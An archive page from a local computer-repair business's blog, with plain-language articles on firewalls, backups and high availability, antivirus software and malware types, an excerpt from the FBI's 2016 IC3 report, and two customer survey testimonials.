Archives 2017

What Is A Firewall?

by Billy J Long Guidance, PSA Articles

Article (PSA‑0006)

A firewall is a security barrier that separates a **trusted** network (your home or business LAN) from an **untrusted** network (the Internet). The term comes from fire‑prevention: just as a special type of wall can slow/stop a fire from spreading, a firewall can stop unwanted traffic from reaching your local devices.

Types of firewalls

  • Software firewall – Runs on an operating system (Windows Defender Firewall, macOS Application Firewall, Linux iptables/nftables, third‑party tools).
  • Hardware firewall – A dedicated appliance or a router with built‑in firewall capabilities.
  • Cloud‑based firewall (FWaaS) – Managed firewalls delivered as a service (e.g., Azure Firewall, AWS Network Firewall, Cloudflare Zero Trust Gateway).
  • Next‑Generation Firewall (NGFW) – Combines traditional packet filtering with deep‑packet inspection, intrusion‑prevention, application control, and often integrated sandboxing.

How Does a Firewall Work?

Firewalls enforce a set of security rules that decide whether to allow or block traffic. They inspect traffic at different layers of the OSI model, using one or more of the following methods.

Core filtering methods

  1. Packet‑filtering (Layer 3/4) – Examines source/destination IP addresses, ports, and protocol type. Simple, fast, but limited to “allow/deny” rules.
  2. Stateful inspection (Layer 4) – Tracks each connection’s state (SYN, SYN‑ACK, ESTABLISHED, FIN). Only packets that belong to a legitimate, established session are permitted, which reduces spoofing.
  3. Proxy / Application‑level gateway (Layer 7) – Acts as an intermediary for specific protocols (HTTP, SMTP, FTP). It can inspect the actual payload, enforce URL filtering, and hide internal IP addresses.
  4. Deep‑packet inspection (DPI) & sandboxing (NGFW) – Analyzes the full content of packets, detects malware, blocks suspicious scripts, and enforces application‑specific policies (e.g., “block Facebook app traffic”).

Do You Need a Firewall?

Absolutely. If a device can reach the Internet, it should be protected by an up‑to‑date firewall.

  • Windows 10/11, macOS, and most Linux distributions include a built‑in host‑based firewall that is enabled by default.
  • Home routers / ISP‑provided gateways usually have a basic hardware firewall (NAT + simple packet filter). You can tighten those rules via the router’s web UI.
  • Small‑business networks benefit from a dedicated firewall appliance or a cloud‑based firewall that offers:
    • Intrusion Prevention System (IPS)
    • Application‑aware filtering
    • VPN termination (site‑to‑site and client‑to‑site)
    • Centralized logging & reporting

Quick self‑check

  1. Is the host‑based firewall turned on? (Windows → “Windows Defender Firewall”; macOS → “Firewall” in Security & Privacy.)
  2. Does your router have the default “block inbound unsolicited traffic” rule enabled?
  3. Are any ports deliberately opened to the Internet (e.g., remote‑desktop, web server)? If so, confirm they are necessary and secured (use VPN, strong passwords, MFA).
  4. Do you have a separate hardware or cloud firewall for your business network? If not, consider adding one as you scale.

Best‑Practice Checklist for Firewall Management (2025)

  • Keep firmware and definitions up to date. Automatic updates are essential to protect against newly discovered exploits.
  • Apply the principle of least privilege. Only allow traffic that is explicitly required; block everything else by default.
  • Use separate zones. Separate Wi‑Fi guests, IoT devices, and corporate workstations into different VLANs/sub‑nets with inter‑zone firewall rules.
  • Enable logging and alerts. Forward logs to a SIEM or a cloud log service to spot abnormal patterns early.
  • Deploy a VPN or Zero‑Trust Network Access (ZTNA) solution. Remote users should never connect directly to the LAN; tunnel through a secure gateway.
  • Regularly review rules. Conduct a quarterly rule‑audit; remove stale or overly permissive entries.
  • Test your configuration. Use tools such as Nmap or external port‑scan services to verify that only intended ports are open.
  • Consider a Next‑Generation Firewall. For businesses, NGFWs provide integrated IPS, URL filtering, and application control, reducing the need for multiple separate security products.

Emerging Trends (2025 Addendum)

  • AI‑assisted threat detection – Modern NGFWs use machine learning to spot anomalous traffic patterns and automatically quarantine suspicious sessions.
  • Zero‑Trust Network Access (ZTNA) – Replaces traditional perimeter firewalls with identity‑centric policies; each request is verified before access is granted.
  • Secure Access Service Edge (SASE) – Converges firewall, secure web gateway, and cloud‑based security into a single, globally distributed service.
  • Immutable, cloud‑native firewalls – Provide auto‑scaling, instant provisioning for hybrid‑cloud environments (Azure Firewall Premium, Google Cloud Armor).

Need a Firewall Review or Upgrade?

If you’re unsure whether your current firewall is configured correctly, or simply need a quick health‑check, give PSA Computer Services a call at (707) 506‑6802. We’ll assess your environment, and ensure you have a modern, reliable protective barrier.

High availability – following the backup rule

by Billy J Long Guidance, PSA Articles

Article (PSA‑0005)

What “High Availability” (HA) Really Means

High Availability is a design goal that ensures a system delivers an agreed level of uptime –‑ usually 99.9 % (≈ 8 h downtime/yr) or higher –‑ even when components fail. Modern businesses (hospitals, data‑centers, SaaS providers, remote offices) depend on HA to keep critical applications running 24/7.

Key HA concepts (2025)

  • Redundancy – Duplicate hardware or virtual instances (servers, storage, network paths) so a single failure never stops service.
  • Failover & Automatic Switchover – Monitoring detects a failure and instantly routes traffic to a standby component (e.g., active‑passive cluster, hot‑standby VM).
  • Load Balancing – Distributes traffic across multiple nodes, improving performance and providing another layer of fault tolerance.
  • Geographic Distribution – Deploying services across multiple data‑center locations or cloud regions reduces the impact of site‑wide outages.
  • Replication & Data Synchronisation – Keeps data copies in near‑real‑time (block‑level or file‑level) on separate nodes.
  • RPO & RTORecovery Point Objective (how much data loss is tolerable) and Recovery Time Objective (how quickly service must be restored). HA architectures are built to meet the RPO/RTO goals you define.

Where Backups Fit In

Backups are the foundation of any HA strategy, but they’re just one piece of the puzzle. A solid backup plan protects you from data loss caused by hardware failure, ransomware, accidental deletion, or catastrophic events.

The classic 3‑2‑1‑0 rule (still the gold standard)

  1. 3 – Three copies – Primary data + two additional backups.
  2. 2 – Two media types – For example, an internal NAS (or disk) plus cloud object storage (e.g., Backblaze B2, Azure Blob, Amazon S3).
  3. 1 – One off‑site location – Store at least one copy in a different physical site or a cloud region.
  4. 0 – Zero‑error verification – Test restores regularly (at least quarterly) to confirm backups are usable.

2025‑enhanced backup practices

  • Immutable storage – Write‑once, read‑many (WORM) or object‑storage lock features that prevent even administrators from overwriting recent backups. This thwarts ransomware that tries to encrypt backups.
  • Snapshot‑based protection – Use volume snapshots (VSS on Windows, LVM snapshots on Linux, or ZFS) for near‑instant point‑in‑time copies.
  • Hybrid cloud backup – Combine on‑premise fast restores with cloud durability; many solutions now offer built‑in encryption, compression, and bandwidth throttling.
  • Automated backup testing – Scripts that periodically restore a random file or database row and verify checksum integrity.
  • Ransomware‑aware backup policies – Separate “live” backup streams from “archival” immutable copies; rotate the live backups daily, weekly, monthly.

Putting It All Together: A Simple HA Blueprint

  1. Assess critical services. Identify which applications, databases, and file shares must stay online.
  2. Define RPO/RTO targets. Example: RPO = 15 minutes for ERP database; RTO = 30 minutes for web portal.
  3. Build redundancy. Deploy two servers (or VMs) in an active‑active cluster behind a load balancer; add a second network path (dual ISP or VLAN).
  4. Implement replication. Use real‑time mirroring (e.g., Storage‑Space‑Direct, DRBD, or cloud‑native database replication) to keep data in sync across nodes.
  5. Apply the 3‑2‑1‑0 backup rule. Schedule daily incremental backups + weekly full backups, store one copy locally, one copy in a second media type, and one copy in a secure cloud region.
  6. Test failover and restore. Quarterly, simulate a server loss and verify that traffic switches automatically, then run a backup‑restore drill to validate data integrity.
  7. Monitor and alert. Use an RMM or SIEM to watch health metrics, backup job success, and latency; set up alerts for any breach of RPO/RTO.

Common Pitfalls to Avoid

  • Treating backups as a “set‑and‑forget” task – without regular testing, backups can be corrupted or incomplete.
  • Relying on a single backup media type (e.g., only external hard drives) – hardware failures are inevitable.
  • Storing all copies in the same physical location – a fire or flood can wipe everything.
  • Neglecting encryption and access controls – unprotected backups are a gold mine for attackers.
  • Ignoring the human factor – document procedures, train staff, and enforce least‑privilege access to backup systems.

Bottom Line

High Availability is much more than “just a backup”. It blends redundancy, real‑time replication, automated failover, and rigorous testing to keep services running. The 3‑2‑1‑0 backup rule remains the foundation, but in 2025 you should augment it with immutable storage, cloud snapshots, and regular restore verification to meet modern RPO/RTO expectations.

Need a Custom HA & Backup Strategy?

PSA Computer Services can design, implement, and test a solution that meets your uptime goals and budget.

Call us today at (707) 506‑6802 for a free assessment.

How Antivirus & Antispyware Work

by Billy J Long Guidance, PSA Articles

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials (no longer supported after Jan 2020). If you are still on Windows 7, upgrade to a supported OS or use a third‑party solution, because Microsoft no longer provides definition updates for Windows 7.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Maldetect + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Self‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).

Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Ensure both AV and antispyware engines have the latest signature database.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – Use msconfig (Windows) or systemctl (Linux) to verify nothing suspicious is set to launch automatically.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, verify SSL certificates, and use a reputable browser.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

IC3 Annual Report – 2016 Internet Crime Report

by Billy J Long FBI - IC3

Dear Reader,

The FBI is the lead federal agency for investigating cyber attacks by criminals, overseas adversaries, and terrorists. With each passing day, cyber intrusions are becoming more sophisticated, dangerous, and common. We continue to transform and develop in order to address the persistent and evolving cyber threats we face.

The FBI’s Internet rime Complaint enter (IC3) provides the public with a trustworthy and convenient reporting mechanism to submit information concerning suspected Internet-facilitated criminal activity. The I3 also strengthens the FBI’s partnerships with our law enforcement and industry partners.

The 2016 Internet rime Report highlights the IC3’s efforts in monitoring trending scams such as Business Email Compromise (BEC), ransomware, tech support fraud, and extortion. In 2016, IC3 received a total of 298,728 complaints with reported losses in excess of $1.3 billion.

This past year, the top three crime types reported by victims were non-payment and nondelivery, personal data breach, and payment scams. The top three crime types by reported loss were BEC, romance and confidence fraud, and non-payment and non-delivery scams.

This year’s report features a section on the importance of law enforcement collaboration and partnerships with the private sector and Intelligence Community. For example, the FBI continues to expand Operation Wellspring (OWS), an initiative through which state and local law enforcement officers are embedded in, and trained by, FBI cyber task forces and serve as the primary case agents on Internet-facilitated criminal investigations. Overall, OWS task forces opened 37 investigations in 2016 and have worked 73 total investigations since OWS was launched in August 2013.

We hope this report will assist you as we work in partnership to protect our nation and combat cyber threats.

Scott S. Smith
Assistant Director
Cyber Division
Federal Bureau of Investigation

Read the full report here: https://www.ic3.gov/Media/PDF/AnnualReport/2016_IC3Report.pdf

Survey Response – Don Herriott

by Billy J Long Guidance, Testimonials

Don Herriott
Rio Dell, CA

1. What would you rate your technicians performance?
Excellent, Great, Okay, Bad

2. How quick was your order completed?
Very Fast, Fast, Okay, Slow

3. How do you feel about our prices?
Excellent, Great, Okay, Bad

4. How was your overall experience?
Excellent, Great, Okay, Bad

5. Would you recommend us to a friend?
Of Course, Maybe, Unsure, No

Review – Billy Joe did everything that we requested and then spent a long time explaining how to do functions on our computer.

Introduction to Malicious Software

by Billy J Long Guidance, PSA Articles

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code directly in memory using legitimate OS tools (PowerShell, WMI, Cobalt Strike). No files are written to disk, making traditional AV signatures less effective.

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering services (e.g., Quad9, Cloudflare DNS‑SEC) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Further Reading

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

Survey Response – Kathy Wildgrube

by Billy J Long Testimonials

Kathy Wildgrube
Rio Dell, CA

1. What would you rate your technicians performance?
Excellent, Great, Okay, Bad

2. How quick was your order completed?
Very Fast, Fast, Okay, Slow

3. How do you feel about our prices?
Excellent, Great, Okay, Bad

4. How was your overall experience?
Excellent, Great, Okay, Bad

5. Would you recommend us to a friend?
Of Course, Maybe, Unsure, No